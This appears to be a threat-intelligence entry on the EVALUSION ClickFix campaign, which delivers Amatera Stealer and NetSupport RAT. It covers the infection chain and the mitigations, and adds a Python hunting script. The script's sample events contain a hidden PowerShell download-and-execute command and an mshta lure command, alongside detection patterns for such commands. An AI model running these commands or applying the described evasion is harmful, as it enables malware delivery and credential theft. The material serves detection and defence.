New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT
The EVALUSION campaign uses the ClickFix social engineering tactic to deliver two payloads: Amatera Stealer and NetSupport RAT. Amatera, an evolution of the AcridRain stealer, targets crypto-wallets, browser data, messaging apps, FTP clients and email clients, and uses evasion techniques built to get past endpoint security products. The infection chain tricks the user into pasting a command into the Windows Run dialog; that command downloads and executes a .NET DLL loader, which injects the stealer into a legitimate process. NetSupport RAT is deployed only when the stealer finds valuable data or determines that the host is domain-joined, which points to deliberate targeting rather than opportunistic spread. The wider campaign also uses phishing emails, compromised websites and fake CAPTCHA pages to spread malware and harvest credentials. Taken together this is rated a medium-severity threat whose main risks are data exfiltration and persistent remote access, especially for organizations holding valuable digital assets or running Active Directory domains.
AI Analysis
Technical Summary
The EVALUSION campaign, first observed in November 2025 and tracked by eSentire, uses the ClickFix social engineering technique to distribute two malware families: Amatera Stealer and NetSupport RAT. Amatera is an evolution of the AcridRain (ACR) stealer, sold as malware-as-a-service (MaaS) on a subscription basis. It collects cryptocurrency wallets, browser data, messaging application data, FTP client credentials and email credentials. To evade analysis it issues WoW64 syscalls directly, that is, it reaches the kernel through the WoW64 transition layer rather than through the ntdll.dll exports that sandboxes, antivirus and EDR agents hook in user mode, so those hooks never see the calls.

Infection chain: the victim is persuaded to paste a command into the Windows Run dialog. That command launches mshta.exe, which runs a PowerShell script that downloads a .NET DLL from MediaFire. The DLL is packed with PureCrypter, a C# crypter and loader, and it injects the Amatera payload into an MSBuild.exe process, where the data harvesting takes place. Every stage runs under a signed Microsoft binary (mshta.exe, powershell.exe, MSBuild.exe), which is why file reputation alone does not stop it.

After collection, Amatera reports to its command-and-control server, which returns NetSupport RAT only if the host is domain-joined or holds files of interest such as crypto-wallets; other victims get the stealer alone. This conditional second stage indicates a deliberate focus on high-value targets. The wider campaign also includes phishing emails with Visual Basic Script attachments that deliver other malware such as XWorm, compromised websites that redirect to fake ClickFix CAPTCHA pages, and the Cephas and Tycoon 2FA phishing kits, which use obfuscation to evade detection. The combination of legitimate Windows binaries and multi-stage payloads complicates both detection and mitigation.
Potential Impact
For European organizations, the EVALUSION campaign poses a significant risk of data theft, including credentials, financial information, and sensitive communications, especially for entities dealing with cryptocurrencies or operating domain-joined environments. The deployment of NetSupport RAT enables persistent remote access, potentially allowing attackers to move laterally, exfiltrate data, or deploy additional payloads. The advanced evasion techniques reduce the effectiveness of traditional endpoint defenses, increasing the likelihood of successful compromise. Organizations in finance, technology, and critical infrastructure sectors could face operational disruption, reputational damage, and regulatory consequences under GDPR due to data breaches. The selective targeting mechanism means that high-value targets within organizations are at particular risk, raising concerns for enterprises with valuable digital assets or complex IT environments.
Mitigation Recommendations
European organizations should layer the following controls:

- Train users to recognize ClickFix lures: no legitimate CAPTCHA, browser fix or document viewer ever asks you to press Win+R and paste a command. Give staff a simple way to report such prompts.
- Disable the Run dialog (the "Remove Run menu from Start Menu" policy, NoRun) for users who do not need it, and block mshta.exe with AppLocker or Windows Defender Application Control. ClickFix variants also feed the same command through the File Explorer address bar or a terminal window, so treat the Run dialog as one vector, not the only one.
- Use EDR telemetry that catches process injection and anomalous PowerShell (hidden windows, execution-policy bypass, in-memory download-and-execute). Amatera's direct WoW64 syscalls exist precisely to slip past user-mode API hooks, so kernel-sourced signals such as ETW threat-intelligence events, Sysmon process-access and remote-thread events, and AMSI are the more reliable sources here.
- Block or closely monitor downloads from file hosting services such as MediaFire at the proxy, and alert on powershell.exe or MSBuild.exe making outbound connections.
- Segment the network and keep privileged accounts off ordinary workstations, so that a NetSupport RAT foothold on a domain-joined host does not translate directly into lateral movement.
- Prefer phishing-resistant MFA (FIDO2/passkeys), which defeats the adversary-in-the-middle kits named here; stolen session cookies taken by the stealer still bypass MFA, so revoke sessions and rotate credentials for users whose hosts were infected.
- Keep email filtering current for VBS attachments and obfuscated phishing-kit links (Cephas, Tycoon 2FA).
- Hunt for the chain on endpoints: explorer.exe spawning mshta.exe with a URL argument, mshta.exe spawning powershell.exe, MSBuild.exe running outside a developer toolchain or with no project file, and commands retained under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which records what users typed into the Run dialog.
- Maintain tested backups and an incident response playbook for stealer and RAT infections, including credential rotation for every account whose secrets were present on an infected host.
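An added hunting example, not code from the article, from eSentire or from the malware authors, that implements the chain checks from the technical summary and the hunting bullet above. It runs over constructed Sysmon Event ID 1 style process-creation events and a constructed RunMRU export; the field layout, PIDs, paths, the example.invalid lure URL and the MediaFire path are all assumptions for illustration, and the MSBuild check is parent-agnostic because the report does not say which process launches MSBuild.exe.

```python
"""Hunt for the EVALUSION ClickFix execution chain and its Run-dialog residue.

Added example; not the article's, eSentire's or the malware's code. Events are
modelled on Sysmon Event ID 1 (process creation); RunMRU is the registry key
Windows writes for the Run dialog. All sample PIDs, paths and URLs below are
constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # its command line


# Heuristics from the reported chain:
# Run dialog -> mshta.exe -> powershell.exe -> download -> MSBuild.exe host.
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-Expression|\biex\b|FromBase64String", re.I)
FILEHOST_RE = re.compile(r"mediafire\.com", re.I)   # file host named in the report
PROJECT_RE = re.compile(r"\.(csproj|vbproj|proj|sln)\b", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_clickfix_chains(events):
    """Return (tag, pid) findings for events matching one of the chain stages."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        # Stage 1: explorer.exe -> mshta.exe with a URL is the Run-dialog pattern.
        if name == "mshta.exe" and pname == "explorer.exe" and URL_RE.search(e.cmdline):
            findings.append(("mshta_from_run_dialog", e.pid))
        # Stage 2: PowerShell spawned by mshta, worse if it downloads or decodes.
        if name in POWERSHELL and pname == "mshta.exe":
            tag = "ps_child_of_mshta"
            if DOWNLOAD_RE.search(e.cmdline):
                tag += "_downloader"
            findings.append((tag, e.pid))
        # Any process pulling from the file host used for the .NET DLL.
        if FILEHOST_RE.search(e.cmdline):
            findings.append(("filehost_download", e.pid))
        # Stage 3: MSBuild.exe with no project file. Parent-agnostic (assumption);
        # needs triage on hosts where developers legitimately run MSBuild.
        if name == "msbuild.exe" and not PROJECT_RE.search(e.cmdline):
            findings.append(("msbuild_without_project", e.pid))
    return findings


def lineage(events, pid):
    """Process ancestry as basenames, root first."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def is_clickfix_lineage(chain):
    """True if an msbuild.exe has mshta.exe anywhere above it; intermediate hops
    are ignored because the loader may pass through PowerShell first (assumption)."""
    if "mshta.exe" not in chain:
        return False
    return "msbuild.exe" in chain[chain.index("mshta.exe") + 1:]


RUNMRU_SUSPECT_RE = re.compile(
    r"mshta|powershell|pwsh|\bcmd(\.exe)?\s+/c|https?://|\bcurl\b|certutil", re.I)


def suspicious_runmru(values):
    """values: RunMRU value name -> data. Windows stores each command as
    '<command>\\1' and MRUList lists the entry letters most-recent first."""
    hits = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter, "")
        cmd = data[:-2] if data.endswith("\\1") else data
        if RUNMRU_SUSPECT_RE.search(cmd):
            hits.append(cmd)
    return hits


# Constructed sample telemetry: one ClickFix chain plus benign noise.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/verify"),
    ProcEvent(3000, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('https://www.mediafire.com/file/placeholder/x.dll')\""),
    ProcEvent(4000, 3000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              "MSBuild.exe"),
    ProcEvent(5000, 1000, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(6000, 1000, r"C:\BuildTools\MSBuild\Current\Bin\MSBuild.exe",
              "MSBuild.exe app.csproj /t:Build"),
]

SAMPLE_RUNMRU = {  # constructed export of the RunMRU key
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "mshta https://example.invalid/verify\\1",
}

if __name__ == "__main__":
    for tag, pid in find_clickfix_chains(SAMPLE_EVENTS):
        print(f"{tag:28s} pid={pid} lineage={' > '.join(lineage(SAMPLE_EVENTS, pid))}")
    print("RunMRU hits:", suspicious_runmru(SAMPLE_RUNMRU))
```

Each stage is flagged separately so a single true positive (explorer.exe launching mshta.exe against a URL) stands on its own, while the weaker MSBuild check is escalated only when lineage() shows mshta.exe above it. Feed real Sysmon or 4688 events into ProcEvent and a `reg export` of RunMRU into suspicious_runmru() to run it on a suspect host.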
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Belgium, Sweden
Technical Details
- Article source: https://thehackernews.com/2025/11/new-evalusion-clickfix-campaign.html (fetched 2025-11-18T01:04:09Z, 1141 words)
Threat ID: 691bc610d4c3ef3c7a5b4586
Added to database: 11/18/2025, 1:04:16 AM
Last enriched: 11/18/2025, 1:04:30 AM
Last updated: 11/18/2025, 7:07:26 AM